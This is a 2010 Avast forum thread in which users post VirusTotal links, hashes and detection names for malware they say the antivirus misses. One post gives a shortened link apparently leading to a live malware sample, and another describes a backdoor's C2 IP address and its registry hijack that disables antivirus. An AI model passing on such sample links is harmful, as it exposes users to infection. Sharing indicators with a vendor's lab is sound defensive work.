Avast WEBforum
Other => Viruses and worms => Topic started by: Lisandro on September 20, 2010, 01:45:21 PM
-
As my first thread got hijacked and closed without even warning me :P, I'm starting a new one to try to help avast improve detection if possible.
Please, post only VirusTotal links and do not post links to malware!
You can always submit a sample through Chest or zip it and send to virus(at)avast(dot)com.
Watching this thread means out-of-bound work for our analysts, therefore the links should provide additional information. You should always know why exactly the link posted by you has a bigger priority than samples sorted out by our internal systems, otherwise it's a waste of time on both sides. You can write a script for browsing VirusTotal results and posting them here, but what will be their benefit for us? We'll receive the files and metadata anyway from VirusTotal (on a regular basis of sample submission), so it means extra manual work that duplicates what a machine does for us.
Guidelines for posting links that make some sense:
1. you know the origin/behavior/way of spreading of the sample (e.g. it comes from a machine that you recently disinfected)
2. the sample is not an adware, toolbar or such low-risk malware/PUP
3. you're able to write related metadata either to VT comments or here
-
Cassino game virus? http://www.virustotal.com/file-scan/report.html?id=16677001425a2306a4fadd980e84b048e8638972ca5b760c27de5afba43a7dd6-1284977670
Trojan downloader? http://www.virustotal.com/file-scan/report.html?id=b155f733a4a76a5f2f1cf2bedfa0cbf998d5ea483e7061f54d9d54a325ad1358-1284903634
http://www.virustotal.com/file-scan/report.html?id=3d1a0e751c8807d1add568576bae8709a8a4661bcd5add8924cc8509f2987d4b-1284975567
Zbot sample? http://www.virustotal.com/file-scan/report.html?id=87d184e9a44e628e217d89b91edff75474e0f682a68a26ac9d6ab650b7249d12-1284979078
http://www.virustotal.com/file-scan/report.html?id=8767ed77b8dc95cdae010d2241385c0e4ae376796024822eae41653a0f76ceab-1284967493
Kazi sample? http://www.virustotal.com/file-scan/report.html?id=2920cba61b1b33d94efdf09458562dc03595aa1d1cddc0135f7e060f9174c011-1284819562
Renos sample? http://www.virustotal.com/file-scan/report.html?id=52c65496937759dee1e63dd533fa3f0d6ff87beae1734f81c56896d71e7b9e6e-1284743283
Suspicious? http://www.virustotal.com/file-scan/report.html?id=43dfad5c0c2e4a3c6cc8e7955b0f0380f9fedf70765770e6c1f3dec05c79c653-1284978756
-
http://www.virustotal.com/file-scan/report.html?id=8b66cd525e28891f8d57bb1c7ea502c1f61e9d3dd9deb7045b744d9b41e460e5-1284986446
-
http://www.virustotal.com/file-scan/report.html?id=6b60b0e9007c7e6d5f7b8d560ec2b2c575f5df5f2169a5e2f096e9376785033e-1284998326
Trojan dropper: http://www.virustotal.com/file-scan/report.html?id=c6373b689fb84cadfcf62efeda2693be7edc829c74caa37f248c270e9959b136-1284999866
Trojan? http://www.virustotal.com/file-scan/report.html?id=9c6049c7cef384e2e57ebefc24186c8fedc10420d39f7b35e03500b214dd80dd-1284994178
Renos sample? http://www.virustotal.com/file-scan/report.html?id=0153b95db49bb9150c9dbd35bb5eb520c852888ce7921cf30bc32de829a99b56-1284982191
-
Trojans?
http://www.virustotal.com/file-scan/report.html?id=f28dafcaf4c723342f53a43ad4cd7980bde5d7d48e6b677cbf0018974ec376f9-1280972203
http://www.virustotal.com/file-scan/report.html?id=543b88457cd1d956fdf0712a07777d10dbb1189b61b58d7ae0e0e8de96664bef-1283388730
-
Renos or FakeAV
http://www.virustotal.com/file-scan/report.html?id=20d7c5fa8ebdc2bbbbafc93d2ee04b90604d12d4696fae69dcf49514b37697a5-1285017531
-
Trojan-Downloader
http://www.virustotal.com/file-scan/report.html?id=dfb116c2c4687fb27ec2c9252e9c5296708c0f201255b7abadaa68e488a60b2a-1285060322
-
Virut? http://www.virustotal.com/file-scan/report.html?id=087cb18f688665a7a05fbea067df6b5d44d35a6b95808e7601698d69e8330181-1285062806
Suspicious: http://www.virustotal.com/file-scan/report.html?id=42bc40621711772252eeec7b0a9e4a55e97f9f21c8e87426d1a4948f951a0ccb-1285062639
Buski? http://www.virustotal.com/file-scan/report.html?id=bcb9dcea286bbb8612f57172013197a0c397e15091d89f9716dfba3b7d182dcb-1285067075
Sent Maxx the links to download (some of) the samples by IM.
-
Undetected malware http://www.virustotal.com/file-scan/report.html?id=0204be4d8b3a25c58975a0db406fe1cc6e61d3af19d61cc2ea9b2a5db68896ae-1285088907
-
New nagware / rogue, NavaShield ( navashield.com ), see video http://www.youtube.com/watch?v=0hxFyDpfcg0
Malwarebytes / Ad-Aware / F-Secure have added detection, 53 MB installer
-
http://www.virustotal.com/file-scan/report.html?id=994a5bc0e21a3b89441e5b70720ef6ba62aa9a0d4a71b33e995766d1d12007f4-1285185342
::)
-
A new rogue A/V program.
http://www.virustotal.com/file-scan/report.html?id=f901ce8b019eca2ddb850fb0783196f28bd3ad33bb321d995371a00b00c70fda-1285225279
-
Another rogue A/V program.
http://www.virustotal.com/file-scan/report.html?id=32582fc3673aba5e57b14b40a2f60ce975afec06a88b9d717661b5f497724ab3-1285296706
And a Trojan.
http://www.virustotal.com/file-scan/report.html?id=52efcdbdf08321cf1fb645c92c97378bde509dda3c15622d96276332284f80f6-1285307240
I've spent the evening passing these around.
-
http://www.virustotal.com/file-scan/report.html?id=e7e2d69c740ca5009ed76f191e2b6706b283f58f8a0fdc1054841929dddee7a1-1285349976
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=d7dbb27f2eb5772d33362645bac7392c2699b08a69e8d8b0d39f98f7dcaaac08-1285371168
And another.
http://www.virustotal.com/file-scan/report.html?id=b9cbec787f7d72c3072bb70d611a47bdeee319a9bc28b65d473f3235b0a5eb8e-1285396797
-
I am very angry !
<<rapidshare links>>
damnit, read the topic name - virustotal links only
-
damnit, read the topic name - virustotal links only
Know.Purposely !
-
@Burkoff
as you see in the topic name, VIRUS TOTAL LINKS ONLY
this is what happened the last time http://forum.avast.com/index.php?topic=63749.0 see the last two posts
so edit the post and remove the download links
-
yeah and Burkoff was already responsible last time, since he's doing that again I suggest a ban.
-
damnit, read the topic name - virustotal links only
Know.Purposely !
Send the samples to Avast! via the interface (through the chest) or otherwise (I don't remember how), do NOT POST THEM HERE!
-
a ransom ;D
http://www.virustotal.com/file-scan/report.html?id=27cc321356d59261ccc711e71651ad68219b041dd3ef999344085ab668bd0c02-1285361736
-
yeah and Burkoff was already responsible last time, since he's doing that again I suggest a ban.
yea....but he is already very angry ;D
I am very angry !
-
just a question: I'm not testing samples and I won't, but for those who do post about stuff missed by Avast, does it make a difference (or not) if heuristic sensitivity is set to high in the web and file system shields?
edit: would be nice if people didn't just post the VT results, but also their own and specify their settings (yeah, I know, this supposes a VM or sandbox...that's just a suggestion).
-
The list came from VirusTotal's Top10 file submissions (Yesterday)
http://www.virustotal.com/file-scan/report.html?id=9ef6116b0e3e1f663e48b76dc2957d97187f7414be0024b721569d67d378ff56-1285448595
http://www.virustotal.com/file-scan/report.html?id=820c0fd3d36354fe2d0f0db9051b1c5164d6b85fd80d922732a105a886f01844-1285445333
http://www.virustotal.com/file-scan/report.html?id=1f5b7c646092641618b79557a47dcc8eba3f96d8f82673568d9d124f5c3fd90a-1285451627
This could be a false positive:
http://www.virustotal.com/file-scan/report.html?id=017c62ee87dfc53f32b774d867f11be1c94911735d051312979861174a7020b0-1285270314
-
Fake ZillaTube:
http://www.virustotal.com/file-scan/report.html?id=c2b7e07688acdcd107fd236532d7156fe0b324b597c0623653e8a1a14958caed-1285510931
Another from VirusTotal's Top10 file submissions (Yesterday)
http://www.virustotal.com/file-scan/report.html?id=9ef6116b0e3e1f663e48b76dc2957d97187f7414be0024b721569d67d378ff56-1285475821
http://www.virustotal.com/file-scan/report.html?id=afbcfe0f0301c5cdb1202ea75f406a04cc9023d34e347e89311f9835bd5c3af9-1285483928
http://www.virustotal.com/file-scan/report.html?id=820c0fd3d36354fe2d0f0db9051b1c5164d6b85fd80d922732a105a886f01844-1285445333
------------------------------------
Could be false positive:
http://www.virustotal.com/file-scan/report.html?id=f609efee5fa8df832ce7708ed58f32021d928089404689eb90ddc1f73d8cd32f-1285105620
------------------------------------
-
I have one link from VirusTotal where Avast found it, and one link from Jotti's malware scan where Avast doesn't find it, on the same virus sample. Why?
http://www.virustotal.com/file-scan/report.html?id=9266c4084e41982ddf7e365be679e53842da37c1bccc5269d2723fdfabeee420-1285516483
-
I have one link from VirusTotal where Avast found it, and one link from Jotti's malware scan where Avast doesn't find it, on the same virus sample. Why?
VT and Jotti may not be on the same update yet ?
-
Ahh, now I see the last update on Jotti's malware scan was 2010-09-14 for every AV there :O
Now they've updated :) avast detects it!
-
http://www.virustotal.com/file-scan/report.html?id=3c36409d24180488f584155defff7498374f47051c0bcccbbd9a8445a6130d05-1285488260
-
Ahh, now I see the last update on Jotti's malware scan was 2010-09-14 for every AV there :O
Now they've updated :) avast detects it!
Jotti also uses Linux versions of AVs I believe, not to mention it has nowhere near the number of scanners of VirusTotal (currently 43), so personally that is the only multi-scanner site I would use.
-
Hi DavidR,
But the folks that report missed samples through VT links should check there again for more recent results; also, sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
polonus
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=7fae8f44ca6ac0119692ca1080f07173bd5d4f170cd412bc261e4328ac283dde-1285557252
Fake Codec Pack.
http://www.virustotal.com/file-scan/report.html?id=637a685f6cdaf0b50ab2f910dba177fb4ab64a7def1d2102de9684d55417b6b8-1285555478
Fake Antivirus Program.
http://www.virustotal.com/file-scan/report.html?id=e38d310882d6057da15048b429858748452df166c5a70521043fe2fdca3e00c6-1285559703
-
damnit, read the topic name - virustotal links only
Know.Purposely !
Send the samples to Avast! via the interface (through the chest) or otherwise (I don't remember how), do NOT POST THEM HERE!
Send a password protected zip file ( Password: virus) to virus@avast.com with the subject "Undetected Malware", Put the password in the body of the e-mail.
-
http://www.virustotal.com/file-scan/report.html?id=24fde02323b42f8cb48acff5414118690e41ff79f37c4ce43573f13387e954c3-1285585170
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=682623d7aa70209c4e39eb5deb0851a8da53fd2d1f048fa31619c4233b438fb3-1285641801
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=b46244c2191de3f5e8eecf16511facbf4c3a98b91ca2604b1d7a6490a36e626a-1285644196
-
Another fake AV.
http://www.virustotal.com/file-scan/report.html?id=8beb25df7bcf9b2c80f6f1f8fc7bdf26e55ae97df4df477094f3ebb2dd1a1189-1285739163
-
http://www.virustotal.com/file-scan/report.html?id=9fcfe985ff93d493ae8c091566b6524deb114748a5a5018f80d797c658311e14-1285836908
http://www.virustotal.com/file-scan/report.html?id=6a17b1626a22aaaf87bb8b1ad173f91b85f2ab4a863a4b4ec5227e8ba4f02879-1285831256
backdoor: winlogon.exe connected to 74.55.58.173 under a weird URL like 2-3-v-5-6-l-w-1-q-9-j-n-6-2-n-8-...
avast disabled by: programs will be disabled, or shall we say redirected to this winlogon.exe, at this registry key [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
programs running: winlogon.exe under the Windows current user name with an svhost.exe child process
version: 206
how to keep your programs running?
put all access to this registry key in read only...
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
this is the 3rd time the same virus variant has gone undetected, but every time I've uploaded to the avast virus lab it took a week before avast detected it (update config every 5 mins).
-
http://www.virustotal.com/file-scan/report.html?id=de2a6bc545a34cc4f3644936c544960dde26377317f543f30c50670a22192e0e-1285782978
http://www.virustotal.com/file-scan/report.html?id=7d6df2766434882417f243e236c192fbee5c8c1479858c6dde5c001d31ee13d8-1285790457
http://www.virustotal.com/file-scan/report.html?id=dec90d6cacde9d8c96addfaee8b6b88a3f0072ba7860a81a0bd1ca95cdc9079e-1285801510
http://www.virustotal.com/file-scan/report.html?id=2bbba7c64d0fc0ad05f6079838a7663f71f0bd5028f67da3af42757417c83486-1285846090
Off topic: a link for you, marc57 http://www.youtube.com/watch?v=ce87ckRKrzk Kiss Madiam won Greece's Got Talent, well done ;D ;D
-
Thanks for the link Left123.
-
http://www.virustotal.com/file-scan/report.html?id=842080c6fcf6418ca93f86fd036beede353b2585f28a523f18381526424376e3-1285835020
http://www.virustotal.com/file-scan/report.html?id=61aac71f0b59c6f008307ab38b4cc8beba7c88189e9cebc63607b3fd39ebb89b-1285942131
-
http://www.virustotal.com/file-scan/report.html?id=7d6ee800c86e3a5fdda89412cf77c7d804847d3fe329ea719bf3734c8c9d5ebf-1285954899
http://www.virustotal.com/file-scan/report.html?id=6f83d51a7eaf9b80ca435fc569e88a99b2ddfede9f6538c2615abb1e9f1b5283-1285939272
http://www.virustotal.com/file-scan/report.html?id=51811522f2f121e40eae7c7a039cf07a002b1abba486639121a60150e2fef691-1285860246
-
http://www.virustotal.com/file-scan/report.html?id=2182a74eb586381e6f119d9ada42743e306ee5b185ae04ae6b216ae95d676147-1286026600
-
I like this thread..!
Thanks, Tech..!! :)
asyn
-
I like this thread..!
Thanks, Tech..!! :)
asyn
You're welcome.
Although I was alerted that just posting virustotal links without further information about the origin of the file, behavior, etc. is just adding manual work for the virus analysts that are receiving 50.000 samples per day.
They have quite some honeypots and they're not really worried about the links posted here.
You could not agree with that.
They do not post in the forum about it (clearly).
-
I like this thread..!
Thanks, Tech..!! :)
asyn
They have quite some honeypots and they're not really worried about the links posted here.
I don't doubt that..! ;)
Nevertheless it's interesting information for us...!!!
asyn
-
If you want to get frightened, here we goes...
... and so on...
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
I also don't see how the average user would be coming into regular normal browsing contact with these, which you are obviously seeking out. Most regular users aren't seeking out malware in this way.
Yes, they could get tricked into downloading something from a search result, but how would this topic help them in any case? It doesn't.
As you have already said the VT links are of little use to the virus labs team, they need the samples to analyse.
<snip>
Although I was alerted that just posting virustotal links without further information about the origin of the file, behavior, etc. is just adding manual work for the virus analysts that are receiving 50.000 samples per day.
They have quite some honeypots and they're not really worried about the links posted here.
<snip>
So it is clear that the sample and information needs to be sent to avast, rather than posting VT links and you can't go posting links to file sharing sites or the origin of the sample, for the very reason the other topic was closed.
That is why I feel this is pointless in this context, not to forget as polonus mentioned, it shouldn't be post and forget, but go back and confirm if the original post is now detected or a false positive.
<snip>
But the folks that report missed samples through VT links should check there again for more recent results; also, sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
<snip>
Over time (now on 4 pages) all you see are missed samples and zero input on samples now added to the database or considered to have been false positives, or all you see is an unbalanced/one sided view.
As you say "If you want to get frightened, here we goes..." the object surely is not to frighten users ???
If it is to improve detections, then you need to send the samples and information to avast as the VT results in isolation are pretty worthless. Especially if those who post them don't follow up to see if they are added or are FPs.
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
Have been thinking the same... how will this improve detection if you don't send the samples?
Or does Tech know something we don't?
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
The other one was closed because people posted open links to malware, I think.
I also don't see how the average user would be coming into regular normal browsing contact with these, which you are obviously seeking out. Most regular users aren't seeking out malware in this way.
Sure. But not all the avast users are "regular normal browsing"...
As you have already said the VT links are of little use to the virus labs team, they need the samples to analyse.
They could get them from virustotal as they have the MD5 of the file.
I haven't been posting links for quite some weeks now, as the avast team just said they won't stop their analysis to manually check the links here. It was becoming useless without the avast team being able to add the definitions.
At least, posting here can show:
1. avast protection needs to be increased. And there are users that can't even talk about that.
2. the avast team could post or react to threads about security and shed some light and knowledge on how to get protected.
But the folks that report missed samples through VT links should check there again for more recent results; also, sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
I always check more recent results.
Did you try my links just after they were posted?
Over time (now on 4 pages) all you see are missed samples and zero input on samples now added to the database or considered to have been false positives, or all you see is an unbalanced/one sided view.
So, which should improve here? Our posting about misdetections or acknowledgment from the avast team?
If we're posting false positives, could it take a while to say that for us? Why not?
As you say "If you want to get frightened, here we goes..." the object surely is not to frighten users ???
Ok, I was thinking that people need to discuss these issues, nothing more.
-
Pondus has shown me a link to http://www.shadowserver.org/wiki/pmwiki.php/Stats/VirusDailyStats
Seems a good source for what I'm trying to talk about.
-
Some weeks ago I made a topic about some Trojan.Ransoms and I only posted VT links, and after about 1 day an avast technician said: samples should be detected now. I only posted VT links and the samples were in the next virus database update.
-
Some weeks ago I made a topic about some Trojan.Ransoms and I only posted VT links, and after about 1 day an avast technician said: samples should be detected now. I only posted VT links and the samples were in the next virus database update.
Lucky you... Our samples did not have that luck :'(
-
Loss of time and labor ...
The avast team will not improve the service of automatic analysis.
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? :P // don't try to tell me there are no such links :-X
as Tech already mentioned: watching this thread means out-of-bound work for our analysts, therefore the links should provide additional information. You should always know why exactly the link posted by you has a bigger priority than samples sorted out by our internal systems, otherwise it's a waste of time on both sides. You can write a script for browsing VirusTotal results and posting them here, but what will be their benefit for us? We'll receive the files and metadata anyway from VirusTotal (on a regular basis of sample submission), so it means extra manual work that duplicates what a machine does for us. Here's a guideline for posting links that make some sense:
1. you know the origin/behavior/way of spreading of the sample (e.g. it comes from a machine that you recently disinfected)
2. the sample is not an adware, toolbar or such low-risk malware/PUP
3. you're able to write related metadata either to VT comments or here
Henrique - Bankers is what bothers you, right? We're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue. If you have better samples, we can talk about processing your submission through our ftp (a daily uploaded batch with a predefined name); if you prove the quality of your feed, we can dedicate someone to its processing maybe.
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? :P // don't try to tell me, there are no such links :-X
+1 ;)
-
Henrique - Bankers is what bothers you, right? We're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue. If you have better samples, we can talk about processing your submission through our ftp (a daily uploaded batch with a predefined name); if you prove the quality of your feed, we can dedicate someone to its processing maybe.
Maxx
What do you attribute the better performance of Avira in the proactive tests of AV-Comparatives to?
-
Bigger virus lab, PCK/*Anything* detections etc., but I haven't seen the diff between our and their misses; actually no one except the testers did, AFAIK.
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? // don't try to tell me, there are no such links
here are 10 ;)
-
Maxx, I've changed the original post accordingly.
New posters, please, read the first post.
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
VirusTotal - 1txW0 - 4/43
http://www.virustotal.com/file-scan/report.html?id=82cd86f7e8f8aa6a566678194c59a15383a7446e3e09233d08bdd3f5c5568f1d-1286268778
NoVirusThanks - 1/16 - INFECTED
http://scanner2.novirusthanks.org/analysis/c9e49130a8c2332a0b709da55d9f92a9/cGljNjc1Nzk5MDc0NTMzLWpwZy13d3ctZmFjZWJv/
Malwarebytes detect as Trojan.Downloader
sample sent to avast!
-
http://www.virustotal.com/file-scan/report.html?id=18f4cfd6275127e80a0a0e9574747e0c10aee5fbfe0722a338ff55e68a71d0fa-1286264334 VT
Rogue av installer
-
VirusTotal: 15/38
http://www.virustotal.com/file-scan/report.html?id=a5952f757310dcdddca5e3263c0198918409792fd93ab6d818eec765dba80779-1286322708
Trojan Downloader
MD5 : 3dc9a53e3f167812c0a54c3d2e2179c0
SHA1 : 4e0fe867b630e8067e6b394078e06c728fd52080
SHA256: a5952f757310dcdddca5e3263c0198918409792fd93ab6d818eec765dba80779
-----------------------------------------------
EDIT.:
VirusTotal: 10/40
http://www.virustotal.com/file-scan/report.html?id=7f062b4b5967ee675136c66dbb689a992b3e5c76d207c5ef332c3602556d2b95-1286324059
Trojan Downloader
MD5 : 03377e95f6f65bcad53b5f5de7e7d3e1
SHA1 : 86542c0cc681b26131c7b55ff3c9031f10049fa1
SHA256: 7f062b4b5967ee675136c66dbb689a992b3e5c76d207c5ef332c3602556d2b95
-----------------------------------------------
EDIT.2:
VirusTotal: 28/43
http://www.virustotal.com/file-scan/report.html?id=1d84be7aced4e4dae1cfd202efcb837edab28f131e6ed5b8ebd3473ae5092f97-1286324820
Trojan.Crypt
MD5 : c970b258d7f5e27ee204200c55008d42
SHA1 : 97c65f6aa34a4c467e162729a7c4440786d6695d
SHA256: 1d84be7aced4e4dae1cfd202efcb837edab28f131e6ed5b8ebd3473ae5092f97
-
Rogue AV program.
http://www.virustotal.com/file-scan/report.html?id=5d00afa237c062d7a0a0d0bb8702f6ab570251bd7f2e1692aa256910fa7a5375-1286335475
Koobface trojan.
http://www.virustotal.com/file-scan/report.html?id=26c57e851ce7c0eab4b4c97cc8c6a5c7d6cfec340d1969f32602ebd6a5d6ece4-1286337613
Trojan.
http://www.virustotal.com/file-scan/report.html?id=78032e3651690ebc1d0ff150881a57d3492c72ab4e1418ee25d96404a04e3b0c-1286382005
-
Trojans?
http://www.virustotal.com/file-scan/report.html?id=f28dafcaf4c723342f53a43ad4cd7980bde5d7d48e6b677cbf0018974ec376f9-1280972203
http://www.virustotal.com/file-scan/report.html?id=543b88457cd1d956fdf0712a07777d10dbb1189b61b58d7ae0e0e8de96664bef-1283388730
The 1st and 2nd ones are viruses.
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
VirusTotal - 1txW0 - 4/43
http://www.virustotal.com/file-scan/report.html?id=82cd86f7e8f8aa6a566678194c59a15383a7446e3e09233d08bdd3f5c5568f1d-1286268778
NoVirusThanks - 1/16 - INFECTED
http://scanner2.novirusthanks.org/analysis/c9e49130a8c2332a0b709da55d9f92a9/cGljNjc1Nzk5MDc0NTMzLWpwZy13d3ctZmFjZWJv/
Malwarebytes detect as Trojan.Downloader
sample sent to avast!
The 1st one is a worm.
-
1. http://www.virustotal.com/file-scan/report.html?id=9273fcb7726e27d6ce7d4d6561d92e6beaee8f525208480a91188b03be5bdab4-1285225953
2. http://www.virustotal.com/file-scan/report.html?id=2d50e814f7fba19ee6612aaa3ea3998736cb9ee7f47879ee08e4a7f5756920ea-1285536786 Trj/CI.A (Panda)
-
VirusTotal: 2/40
http://www.virustotal.com/file-scan/report.html?id=b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec-1286338107
Trojan-Banker.Win32.Banker.bbcy(Kaspersky)
MD5 : 6605aa15e2de9ffa6129b4fe5de0582f
SHA1 : 6ba31ccd445fee3ab5b74bd6097ef78b7f48b01c
SHA256: b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec
-
http://www.virustotal.com/file-scan/report.html?id=f4c23e3c8c51affb73e1d3a73871ea71234ee340c61630eccaa2ad97913c26d4-1286437643
http://www.virustotal.com/file-scan/report.html?id=e2e15ea76804a2de2899be9e11e1cb150d5e88c2e0f32a9b7713b40e56b988cc-1286437648
-
http://www.virustotal.com/file-scan/report.html?id=178e78e5c7b9a8a1cde83eacfb5a10271e417ab45be46f792321fd408daeda6d-1284101083
FAKE AV!
http://www.virustotal.com/file-scan/report.html?id=8593e8ee7bd5c6891e360586ba9fe7a1cc5a4c7d784d440ebe01dc9ab9747b39-1283842972
Koobface
P.S.: let's say thanks to the team for their hard work adding samples in the next virus database update.
Thank you, team.
-
Why hasn't my sample been analyzed yet?
It's happening again...
VirusTotal: 2/40
http://www.virustotal.com/file-scan/report.html?id=b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec-1286338107
Trojan-Banker.Win32.Banker.bbcy(Kaspersky)
MD5 : 6605aa15e2de9ffa6129b4fe5de0582f
SHA1 : 6ba31ccd445fee3ab5b74bd6097ef78b7f48b01c
SHA256: b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec
----------------------------------------------------------------
EDIT.:
Today it was finally detected by avast.
-
http://www.virustotal.com/file-scan/report.html?id=83d8c2539c118d0bd55700c85d605d5db5442094894b541a1e1755732bffab11-1286559056
-
VirusTotal: 19/43
http://www.virustotal.com/file-scan/report.html?id=87beb04a79148247493b3a37825876c29b129bf1edbe1ed828c6ffc8ab4dcd40-1286570395
TR/VB.Downloader.Gen(Avira)
MD5 : c3eeba8fd7acf081ee82bebf6df7978b
SHA1 : 99297bec5a97d608cd8d5778731a1ae4f4ec8043
SHA256: 87beb04a79148247493b3a37825876c29b129bf1edbe1ed828c6ffc8ab4dcd40
----------------------------------------------------------------------------------------
VirusTotal: 9/43
http://www.virustotal.com/file-scan/report.html?id=c183e478ef4b70b248b3fd005c43691805953e74d9e6432c9c968fdfdb451818-1286570694
Trojan-Banker.Win32.Banker2.zz(Kaspersky)
MD5 : e3a58b376b1d22878a32231a17475e25
SHA1 : 6c466543846c5429cf57439df8119db9dd8522a0
SHA256: c183e478ef4b70b248b3fd005c43691805953e74d9e6432c9c968fdfdb451818
-
http://www.virustotal.com/file-scan/report.html?id=151a6e1fb7f2bfbe109e57af0759b52e02c4c50f95fd9eba5b39a9ca6df27edd-1286648404
http://www.virustotal.com/file-scan/report.html?id=2ec649009442d1d94ee8d5b7a3ab957d1c9eeb0495b04df9c851ad240273e1c4-1286623698
http://www.virustotal.com/file-scan/report.html?id=449be1b8efd82f2dc2c5b9a85e1083da85d04ab3d9ce20543e0fbccdd6ba25c7-1286632785
Source:
Top10 file submissions (Yesterday) -- October 9th 2010
-
hello all
http://www.virustotal.com/file-scan/report.html?id=e8653f7692b503be7b1031c2c0635dcd8b67a55ff92a6d72748353e9478a360f-1286643149
TROJAN.FAKEAV
-
VirusTotal: 3/43
http://www.virustotal.com/file-scan/report.html?id=f95fb716da9ea901d7a52b0c955bddd9aed3cfe1769e5f4c15063e1fdb0944fe-1286648795
TR/VB.Downloader.Gen (Avira)
MD5 : e3213d77cc1602bc958980ba707b40a0
SHA1 : 8ec8f807db0efb855cb4317c488141038cf36fc4
SHA256: f95fb716da9ea901d7a52b0c955bddd9aed3cfe1769e5f4c15063e1fdb0944fe
-
Keep posting, Henrique. We need a better avast against these banking nasties.
-
Keep posting, Henrique. We need a better avast against these banking nasties.
OK!
I'll try to keep posting.
I hope the avast team is interested.
They represent half of the infections here in Brazil.
-
They represent half of the infections here in Brazil.
Do you have a link to these statistics?
-
http://www.virustotal.com/file-scan/report.html?id=50f1e0f1d67c512ccf52968649c779aabadc0024ca8a4ca6057418661928faf8-1286702655
FAKE.AV
http://www.virustotal.com/file-scan/report.html?id=5d08da063231545fea060e71e15507bea60c6ad97fd1700f53545fab5cf5898e-1285189006
RANSOM
-
Top 10 File Submissions (Yesterday - October 10, 2010)
http://www.virustotal.com/file-scan/report.html?id=4a8cfca9e280f5586c69bd9948099936a3824b0221bb571680f121d1342b4fc3-1286720346
http://www.virustotal.com/file-scan/report.html?id=c81f47b0501627fd4616088908f24a9a5d87c9093fcf5516e072eb11ef635089-1286725443
http://www.virustotal.com/file-scan/report.html?id=eb080beb52532084e750ea9bb8f07dac0546325a06cc5757300d1e86cda311c9-1286704474
http://www.virustotal.com/file-scan/report.html?id=bcf4ae360fd9911e086b1c2b6d7fa310878119110cabc57fff9ae54ca325c3ae-1286712048
http://www.virustotal.com/file-scan/report.html?id=151a6e1fb7f2bfbe109e57af0759b52e02c4c50f95fd9eba5b39a9ca6df27edd-1286731205
-
http://www.virustotal.com/file-scan/report.html?id=dd48243c92f56cdf0bd82277188bca55bdc1ee8fd780cc0a191da1cc3022bbcb-1286722277
ROGUE
-
They represent half of the infections here in Brazil.
Do you have a link to these statistics?
No, but I will read something about it.
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=e88fc12405ae7f28b368d28d921f7c5e554f00d2a233c54c1e827a5c83a83124-1286744412
MD5 : f30bbe6c1be7dcfba53c0ff91fe9611f
SHA1 : 3ec4e234202f91be68689acbabf0b9afcc296c1f
SHA256: e88fc12405ae7f28b368d28d921f7c5e554f00d2a233c54c1e827a5c83a83124
TROJAN
http://www.virustotal.com/file-scan/report.html?id=9e85108aad359dcf78b710219ac793ce8ec6f11c2b45d8752be0311918f5478e-1286745103
MD5 : f62f0ea09dbce2004479913b32627c09
SHA1 : 9c1550914ccf925f462393f76aff750e3d922001
SHA256: 9e85108aad359dcf78b710219ac793ce8ec6f11c2b45d8752be0311918f5478e
TROJAN
http://www.virustotal.com/file-scan/report.html?id=2616945a7ad2fddc354f05d5f7ce8163e32d1413155450922c0f87ac401b8f27-1286745416
MD5 : d17eb44d70475567b9f2179a83d13742
SHA1 : cd3f20e2e397cca28692daa3ae3d8128c3c48319
SHA256: 2616945a7ad2fddc354f05d5f7ce8163e32d1413155450922c0f87ac401b8f27
ROGUE
http://www.virustotal.com/file-scan/report.html?id=bf624604a1ff74205337b7decf9f87a459c1e4a78c96f5ab3f2427dbaa30e82a-1286746026
MD5 : 9156935075b0d1a7ed5cdde328adb770
SHA1 : 5130017edf8bb60c36e450cf226d5f663ad2ae74
SHA256: bf624604a1ff74205337b7decf9f87a459c1e4a78c96f5ab3f2427dbaa30e82a
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=84e684de433dd3f05428caf888de4d350908c39fcf6cddfc69079424d4957c10-1286746576
MD5 : 9902efa3f2347c2ca700ea7e530cc5da
SHA1 : 644cca819711b244f869fa0dae71aa40a23198b9
SHA256: 84e684de433dd3f05428caf888de4d350908c39fcf6cddfc69079424d4957c10
http://www.virustotal.com/file-scan/report.html?id=46a15ed01953fd6562fbe757b72002197831ece572c77fec677ba9d92072c191-1286746792
MD5 : 46c9efcb59e07ac75d88d333112e78f7
SHA1 : 29660f2cfa94c78fe637c00757bd7098b381ded7
SHA256: 46a15ed01953fd6562fbe757b72002197831ece572c77fec677ba9d92072c191
http://www.virustotal.com/file-scan/report.html?id=82ed55d14ad5466ffd041edb6df1161647c5d88ef356ce86604a85fd937ea56e-1286747427
MD5 : 022f6b5772d69881a19f041c119447e1
SHA1 : 65ee60e70b1664aba79752678977166ee608e505
SHA256: 82ed55d14ad5466ffd041edb6df1161647c5d88ef356ce86604a85fd937ea56e
TROJAN
http://www.virustotal.com/file-scan/report.html?id=5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742-1286749271
MD5 : 2d2f0c7af61867cd84f2e419a62cef16
